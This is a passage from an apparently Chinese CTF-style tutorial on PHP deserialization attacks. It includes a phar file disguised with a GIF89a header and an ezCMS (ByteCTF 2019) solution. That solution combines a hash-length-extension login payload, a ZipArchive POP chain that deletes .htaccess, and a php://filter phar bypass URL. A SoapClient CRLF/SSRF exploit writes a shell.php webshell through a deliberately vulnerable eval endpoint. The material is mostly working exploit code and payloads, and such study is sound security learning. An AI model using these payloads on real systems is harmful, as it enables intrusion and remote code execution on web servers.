<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if (($_FILES[&quot;file&quot;][&quot;type&quot;]==&quot;image/gif&quot;)&amp;&amp;(substr($_FILES[&quot;file&quot;][&quot;name&quot;], strrpos($_FILES[&quot;file&quot;][&quot;name&quot;], &apos;.&apos;)+1))== &apos;gif&apos;) &#123;</span><br><span class="line">    echo &quot;Upload: &quot; . $_FILES[&quot;file&quot;][&quot;name&quot;];</span><br><span class="line">    echo &quot;Type: &quot; . $_FILES[&quot;file&quot;][&quot;type&quot;];</span><br><span class="line">    echo &quot;Temp file: &quot; . $_FILES[&quot;file&quot;][&quot;tmp_name&quot;];</span><br><span class="line"></span><br><span class="line">    if (file_exists(&quot;upload_file/&quot; . $_FILES[&quot;file&quot;][&quot;name&quot;]))</span><br><span class="line">      &#123;</span><br><span class="line">      echo $_FILES[&quot;file&quot;][&quot;name&quot;] . &quot; already exists. &quot;;</span><br><span class="line">      &#125;</span><br><span class="line">    else</span><br><span class="line">      &#123;</span><br><span class="line">      move_uploaded_file($_FILES[&quot;file&quot;][&quot;tmp_name&quot;],</span><br><span class="line">      &quot;upload_file/&quot; .$_FILES[&quot;file&quot;][&quot;name&quot;]);</span><br><span class="line">      echo &quot;Stored in: &quot; . &quot;upload_file/&quot; . $_FILES[&quot;file&quot;][&quot;name&quot;];</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">else</span><br><span class="line">  &#123;</span><br><span class="line">  echo &quot;Invalid file,you can only upload gif&quot;;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>index.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class TestObject&#123;</span><br><span class="line">    var $data = &apos;echo &quot;Hello World&quot;;&apos;;</span><br><span class="line">    function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        eval($this -&gt; data);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">if ($_GET[&quot;file&quot;])&#123;</span><br><span class="line">    file_exists($_GET[&quot;file&quot;]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>绕过思路：GIF格式验证可以通过在文件头部添加GIF89a绕过</p>
<p>我们可以构造一个php来生成phar.phar。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    class TestObject &#123;</span><br><span class="line">    &#125;</span><br><span class="line">    $phar = new Phar(&quot;phar.phar&quot;); //后缀名必须为phar</span><br><span class="line">    $phar-&gt;startBuffering();</span><br><span class="line">    $phar-&gt;setStub(&quot;GIF89a&quot;.&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;); //设置stub</span><br><span class="line">    $o = new TestObject();</span><br><span class="line">    $o -&gt; data=&apos;phpinfo();&apos;; //控制TestObject中的data为phpinfo()。</span><br><span class="line">    $phar-&gt;setMetadata($o); //将自定义的meta-data存入manifest</span><br><span class="line">    $phar-&gt;addFromString(&quot;test.txt&quot;, &quot;test&quot;); //添加要压缩的文件</span><br><span class="line">    //签名自动计算</span><br><span class="line">    $phar-&gt;stopBuffering();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>利用过程：</p>
<ul>
<li>一、生成一个phar.phar，修改后缀名为phar.gif</li>
</ul>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20191003102309-bdd64120-e584-1.jpg" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20191003102309-bdd64120-e584-1.jpg" alt="img"></a></p>
<ul>
<li>二、上传到upload_file目录下</li>
</ul>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20191003102310-be6e25bc-e584-1.jpg" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20191003102310-be6e25bc-e584-1.jpg" alt="img"></a></p>
<ul>
<li>三、访问：<a href="http://127.0.0.1/index.php?file=upload_file/phar.gif" target="_blank" rel="noopener">http://127.0.0.1/index.php?file=upload_file/phar.gif</a></li>
</ul>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20191003102313-c07d9e8c-e584-1.jpg" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20191003102313-c07d9e8c-e584-1.jpg" alt="img"></a></p>
<p>可见已经执行了phpinfo命令了。</p>
<p>通过修改后缀名和文件头，能够绕过大部分的校验。</p>
<h4 id="配合PHP内核哈希表碰撞攻击"><a href="#配合PHP内核哈希表碰撞攻击" class="headerlink" title="配合PHP内核哈希表碰撞攻击"></a>配合PHP内核哈希表碰撞攻击</h4><p>参考：<a href="https://xz.aliyun.com/t/2613" target="_blank" rel="noopener">https://xz.aliyun.com/t/2613</a></p>
<h2 id="原生类序列化-ZipArchive-open"><a href="#原生类序列化-ZipArchive-open" class="headerlink" title="原生类序列化(ZipArchive::open)"></a>原生类序列化(ZipArchive::open)</h2><p>拿这次2019 ByteCTF的ezCMS这道题来学习这个知识点。</p>
<p>先是哈希长度扩展攻击 <a href="https://www.cnblogs.com/pcat/p/5478509.html" target="_blank" rel="noopener">参考</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">登录账户：admin</span><br><span class="line">登录密码：admin%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00test</span><br><span class="line"></span><br><span class="line">置cookie：user=2e05fd4ee5d0ec7853d174d06cd3ca47;</span><br></pre></td></tr></table></figure>

<p>config.php：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">session_start();</span><br><span class="line">error_reporting(0);</span><br><span class="line">$sandbox_dir = &apos;sandbox/&apos;. md5($_SERVER[&apos;REMOTE_ADDR&apos;]); // sandbox + md5(ip)</span><br><span class="line">global $sandbox_dir;</span><br><span class="line"></span><br><span class="line">function login()&#123;</span><br><span class="line"></span><br><span class="line">    $secret = &quot;********&quot;;</span><br><span class="line">    setcookie(&quot;hash&quot;, md5($secret.&quot;adminadmin&quot;));</span><br><span class="line">    return 1;</span><br><span class="line"></span><br><span class="line"># 52107b08c0f3342d2153ae1d68e6262c</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function is_admin()&#123;</span><br><span class="line">    $secret = &quot;********&quot;;</span><br><span class="line">    $username = $_SESSION[&apos;username&apos;];</span><br><span class="line">    $password = $_SESSION[&apos;password&apos;];</span><br><span class="line">    if ($username == &quot;admin&quot; &amp;&amp; $password != &quot;admin&quot;)&#123;</span><br><span class="line">        if ($_COOKIE[&apos;user&apos;] === md5($secret.$username.$password))&#123;</span><br><span class="line">            return 1;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Check&#123; // 检查一些关键字</span><br><span class="line">    public $filename;</span><br><span class="line"></span><br><span class="line">    function __construct($filename)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;filename = $filename;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function check()&#123;</span><br><span class="line">        $content = file_get_contents($this-&gt;filename);</span><br><span class="line"></span><br><span class="line">        $black_list = [&apos;system&apos;,&apos;eval&apos;,&apos;exec&apos;,&apos;+&apos;,&apos;passthru&apos;,&apos;`&apos;,&apos;assert&apos;]; // 检查了文件中的一些关键字</span><br><span class="line"></span><br><span class="line">        foreach ($black_list as $k=&gt;$v)&#123;</span><br><span class="line">            if (stripos($content, $v) !== false)&#123;</span><br><span class="line">                die(&quot;your file make me scare&quot;);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        return 1;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class File&#123;</span><br><span class="line"></span><br><span class="line">    public $filename;</span><br><span class="line">    public $filepath;</span><br><span class="line">    public $checker;</span><br><span class="line"></span><br><span class="line">    function __construct($filename, $filepath)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;filepath = $filepath;</span><br><span class="line">        $this-&gt;filename = $filename;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function view_detail()&#123;</span><br><span class="line"></span><br><span class="line">        if (preg_match(&apos;/^(phar|compress|compose.zlib|zip|rar|file|ftp|zlib|data|glob|ssh|expect)/i&apos;, $this-&gt;filepath))&#123;</span><br><span class="line">            die(&quot;nonono~&quot;);</span><br><span class="line">        &#125;   </span><br><span class="line">        $mine = mime_content_type($this-&gt;filepath); //这里可以触发phar反序列化</span><br><span class="line">        $store_path = $this-&gt;open($this-&gt;filename, $this-&gt;filepath);</span><br><span class="line">        $res[&apos;mine&apos;] = $mine;</span><br><span class="line">        $res[&apos;store_path&apos;] = $store_path;</span><br><span class="line">        return $res;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function open($filename, $filepath)&#123;</span><br><span class="line">        $res = &quot;$filename is in $filepath&quot;;</span><br><span class="line">        return $res;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct()   //类被销毁时自动触发</span><br><span class="line">    &#123;</span><br><span class="line">        if (isset($this-&gt;checker))&#123;</span><br><span class="line">            $this-&gt;checker-&gt;upload_file();   //调用upload_file()方法</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Admin&#123;</span><br><span class="line">    public $size;</span><br><span class="line">    public $checker;</span><br><span class="line">    public $file_tmp;</span><br><span class="line">    public $filename;</span><br><span class="line">    public $upload_dir;</span><br><span class="line">    public $content_check;</span><br><span class="line"></span><br><span class="line">    function __construct($filename, $file_tmp, $size)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;upload_dir = &apos;sandbox/&apos;.md5($_SERVER[&apos;REMOTE_ADDR&apos;]);</span><br><span class="line">        if (!file_exists($this-&gt;upload_dir))&#123;</span><br><span class="line">            mkdir($this-&gt;upload_dir, 0777, true);</span><br><span class="line">        &#125;</span><br><span class="line">        if (!is_file($this-&gt;upload_dir.&apos;/.htaccess&apos;))&#123;</span><br><span class="line">            file_put_contents($this-&gt;upload_dir.&apos;/.htaccess&apos;, &apos;lolololol, i control all&apos;);</span><br><span class="line">        &#125;</span><br><span class="line">        $this-&gt;size = $size;</span><br><span class="line">        $this-&gt;filename = $filename;</span><br><span class="line">        $this-&gt;file_tmp = $file_tmp;</span><br><span class="line"></span><br><span class="line">        $this-&gt;content_check = new Check($this-&gt;file_tmp);</span><br><span class="line"></span><br><span class="line">        $profile = new Profile();</span><br><span class="line"></span><br><span class="line">        $this-&gt;checker = $profile-&gt;is_admin();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function upload_file()&#123;</span><br><span class="line"></span><br><span class="line">        if (!$this-&gt;checker)&#123;</span><br><span class="line">            die(&apos;u r not admin&apos;);</span><br><span class="line">        &#125;</span><br><span class="line">        $this-&gt;content_check -&gt; check();</span><br><span class="line">        $tmp = explode(&quot;.&quot;, $this-&gt;filename);</span><br><span class="line">        $ext = end($tmp); // </span><br><span class="line">        if ($this-&gt;size &gt; 204800)&#123;</span><br><span class="line">            die(&quot;your file is too big&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        # </span><br><span class="line">        move_uploaded_file($this-&gt;file_tmp, $this-&gt;upload_dir.&apos;/&apos;.md5($this-&gt;filename).&apos;.&apos;.$ext);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __call($name, $arguments)</span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Profile&#123;</span><br><span class="line"></span><br><span class="line">    public $username;</span><br><span class="line">    public $password;</span><br><span class="line">    public $admin;</span><br><span class="line"></span><br><span class="line">    public function is_admin()&#123;</span><br><span class="line"></span><br><span class="line">        //从SESSION当中取用户名和密码</span><br><span class="line">        $this-&gt;username = $_SESSION[&apos;username&apos;];</span><br><span class="line">        $this-&gt;password = $_SESSION[&apos;password&apos;];</span><br><span class="line"></span><br><span class="line">        $secret = &quot;********&quot;;</span><br><span class="line"></span><br><span class="line">        if ($this-&gt;username === &quot;admin&quot; &amp;&amp; $this-&gt;password != &quot;admin&quot;)&#123;</span><br><span class="line">            if ($_COOKIE[&apos;user&apos;] === md5($secret.$this-&gt;username.$this-&gt;password))&#123;</span><br><span class="line">                return 1;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        return 0;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    function __call($name, $arguments) //当调用不存在的方式时触发</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;admin-&gt;open($this-&gt;username, $this-&gt;password); //这里作为</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>view.php:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">include (&quot;config.php&quot;);</span><br><span class="line">$file_name = $_GET[&apos;filename&apos;];</span><br><span class="line">$file_path = $_GET[&apos;filepath&apos;];</span><br><span class="line">$file_name=urldecode($file_name);</span><br><span class="line">$file_path=urldecode($file_path);</span><br><span class="line">$file = new File($file_name, $file_path);   //调用File类</span><br><span class="line">$res = $file-&gt;view_detail();                //调用view_detail方法</span><br><span class="line">$mine = $res[&apos;mine&apos;];</span><br><span class="line">$store_path = $res[&apos;store_path&apos;];</span><br><span class="line"></span><br><span class="line">echo &lt;&lt;&lt;EOT</span><br><span class="line">&lt;div style=&quot;height: 30px; width: 1000px;&quot;&gt;</span><br><span class="line">&lt;Ariel&gt;mine: &#123;$mine&#125;&lt;/Ariel&gt;&lt;br&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line">&lt;div style=&quot;height: 30px; &quot;&gt;</span><br><span class="line">&lt;Ariel&gt;file_path: &#123;$store_path&#125;&lt;/Ariel&gt;&lt;br&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line">EOT;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>在view.php中，url中传递的filename与filepath进行一次url编码之后传递到File类中调用view_detail方法。</p>
<p>view_detail方法中存在一个<code>mime_content_type()</code>函数, 这个函数是可以导致phar反序列化的。</p>
<p>在此之前：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if (preg_match(&apos;/^(phar|compress|compose.zlib|zip|rar|file|ftp|zlib|data|glob|ssh|expect)/i&apos;, $this-&gt;filepath))&#123;</span><br><span class="line">            die(&quot;nonono~&quot;);</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>这个正则禁止了大部分的进行phar反序列化的关键词，不允许这些关键词出现在filepath的开头。但是这里漏了一个php://协议。 <a href="https://www.xctf.org.cn/library/details/17e9b70557d94b168c3e5d1e7d4ce78f475de26d/" target="_blank" rel="noopener">参考SUCTF</a></p>
<p>找到了phar反序列化触发点之后，开始构造一条可利用的POP链，思路：</p>
<ol>
<li>File类的<code>__destruct()</code>会调用<code>$this-&gt;checker-&gt;upload_file()</code>。可以将<code>$this-&gt;checker</code>赋值为Profile类</li>
<li>因为<code>$this-&gt;checker</code>没有Profile类，触发<code>__call()</code>魔术方法</li>
<li>调用<code>$this-&gt;admin-&gt;open($this-&gt;username, $this-&gt;password);</code> 这里可以使用原生类反序列化</li>
</ol>
<p>原生类反序列化<a href="https://xi4or0uji.github.io/2019/06/27/php反序列化由浅到深/" target="_blank" rel="noopener">参考</a></p>
<p>简要笔记：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用PHP函数 ZipArchive::open($filename, $flags)</span><br><span class="line">当$flag=ZipArchive::OVERWRITE时，就会将$filename的文件删除</span><br></pre></td></tr></table></figure>

<p>构造Payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class File&#123;</span><br><span class="line">    public $filename;</span><br><span class="line">    public $filepath;</span><br><span class="line">    public $checker;</span><br><span class="line"></span><br><span class="line">    function __construct($filename, $filepath)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;filepath = $filepath;</span><br><span class="line">        $this-&gt;filename = $filename;</span><br><span class="line">        $this-&gt;checker = new Profile();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">class Profile&#123;</span><br><span class="line">    public $username;</span><br><span class="line">    public $password;</span><br><span class="line">    public $admin;</span><br><span class="line"></span><br><span class="line">    function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;username = &quot;./sandbox/f528764d624db129b32c21fbca0cb8d6/.htaccess&quot;;</span><br><span class="line">        $this-&gt;password = &quot;ZipArchive::OVERWRITE&quot;;</span><br><span class="line">        $this-&gt;admin = new ZipArchive();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a = new File(&quot;threezh1&quot;, &quot;threezh1&quot;);</span><br><span class="line"></span><br><span class="line">class TestObject &#123;</span><br><span class="line">&#125;</span><br><span class="line">@unlink(&quot;phar.phar&quot;);</span><br><span class="line">$phar = new Phar(&quot;phar.phar&quot;); //后缀名必须为phar</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;setStub(&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;); //设置stub</span><br><span class="line">$o = new TestObject();</span><br><span class="line">$phar-&gt;setMetadata($a); //将自定义的meta-data存入manifest</span><br><span class="line">$phar-&gt;addFromString(&quot;test.txt&quot;, &quot;test&quot;); //添加要压缩的文件</span><br><span class="line">//签名自动计算</span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>先把phar文件生成出来上传。</p>
<p>再访问：<a href="http://127.0.0.1/view.php?filename=9c7f4a2fbf2dd3dfb7051727a644d99f.phar&amp;filepath=php://filter/resource=phar://sandbox/f528764d624db129b32c21fbca0cb8d6/9c7f4a2fbf2dd3dfb7051727a644d99f.phar" target="_blank" rel="noopener">http://127.0.0.1/view.php?filename=9c7f4a2fbf2dd3dfb7051727a644d99f.phar&amp;filepath=php://filter/resource=phar://sandbox/f528764d624db129b32c21fbca0cb8d6/9c7f4a2fbf2dd3dfb7051727a644d99f.phar</a></p>
<p>即可把.htaccess删除，再直接去访问一句话木马连蚁剑拿flag。(这里由于题目已经关了，自己的环境总是出问题，就没复现成功。)</p>
<h2 id="原生类魔法函数-soapClient类"><a href="#原生类魔法函数-soapClient类" class="headerlink" title="原生类魔法函数(soapClient类)"></a>原生类魔法函数(soapClient类)</h2><p>参考这一篇：<a href="https://coomrade.github.io/2018/10/26/反序列化攻击面拓展提高篇/" target="_blank" rel="noopener">反序列化攻击面拓展提高篇</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">SOAP是webService三要素（SOAP、WSDL(WebServicesDescriptionLanguage)、UDDI(UniversalDescriptionDiscovery andIntegration)）之一</span><br><span class="line">WSDL 用来描述如何访问具体的接口 </span><br><span class="line">UDDI用来管理，分发，查询webService </span><br><span class="line">SOAP（简单对象访问协议）是连接或Web服务或客户端和Web服务之间的接口。</span><br><span class="line"></span><br><span class="line">webService相当于 HTTP + XML</span><br></pre></td></tr></table></figure>

<p>SoapClient()方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">public SoapClient::SoapClient ( mixed $wsdl [, array $options ] )</span><br></pre></td></tr></table></figure>

<p>第一个参数是用来指明是否是wsdl模式，如果为null，那就是非wsdl模式，反序列化的时候会对第二个参数指明的url进行soap请求。</p>
<p>用Soap进行SSRF也有两个需要注意的点：</p>
<ul>
<li>Soap不是默认开启的，需要手动开启</li>
<li>需要触发__call方法才能进行SSRF</li>
</ul>
<p>SOAP =&gt; CRLF =&gt; SSRF</p>
<p>文章当中的exp.php：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$target = &apos;http://127.0.0.1/test.php&apos;;</span><br><span class="line">$post_string = &apos;1=file_put_contents(&quot;shell.php&quot;, &quot;&lt;?php phpinfo();?&gt;&quot;);&apos;;</span><br><span class="line">$headers = array(</span><br><span class="line">    &apos;X-Forwarded-For: 127.0.0.1&apos;,</span><br><span class="line">    &apos;Cookie: xxxx=1234&apos;</span><br><span class="line">    );</span><br><span class="line">$b = new SoapClient(null,array(&apos;location&apos; =&gt; $target,&apos;user_agent&apos;=&gt;&apos;wupco^^Content-Type: application/x-www-form-urlencoded^^&apos;.join(&apos;^^&apos;,$headers).&apos;^^Content-Length: &apos;.(string)strlen($post_string).&apos;^^^^&apos;.$post_string,&apos;uri&apos;      =&gt; &quot;aaab&quot;));</span><br><span class="line"></span><br><span class="line">$aaa = serialize($b);</span><br><span class="line">$aaa = str_replace(&apos;^^&apos;,&apos;%0d%0a&apos;,$aaa);</span><br><span class="line">$aaa = str_replace(&apos;&amp;&apos;,&apos;%26&apos;,$aaa);</span><br><span class="line">echo $aaa;</span><br><span class="line">$c=unserialize(urldecode($aaa));</span><br><span class="line">$c-&gt;ss();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>test.php:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">if($_SERVER[&apos;REMOTE_ADDR&apos;]==&apos;127.0.0.1&apos;)&#123;</span><br><span class="line">    echo &apos;hi&apos;;</span><br><span class="line">    @$a=$_POST[1];</span><br><span class="line">    @eval($a);</span><br><span class="line">&#125;</span><br><span class="line"> ?&gt;</span><br></pre></td></tr></table></figure>

<p>访问 <code>http://127.0.0.1/exp.php</code> 可在目录下写入一个shell.php。</p>
<h2 id="Session反序列化"><a href="#Session反序列化" class="headerlink" title="Session反序列化"></a>Session反序列化</h2><p>参考这一篇<a href="https://blog.spoock.com/2016/10/16/php-serialize-problem/" target="_blank" rel="noopener">PHP中SESSION反序列化机制</a></p>
<h3 id="PHP中的session保存"><a href="#PHP中的session保存" class="headerlink" title="PHP中的session保存"></a>PHP中的session保存</h3><p>PHP.ini有以下配置项用于控制session有关的设置：</p>
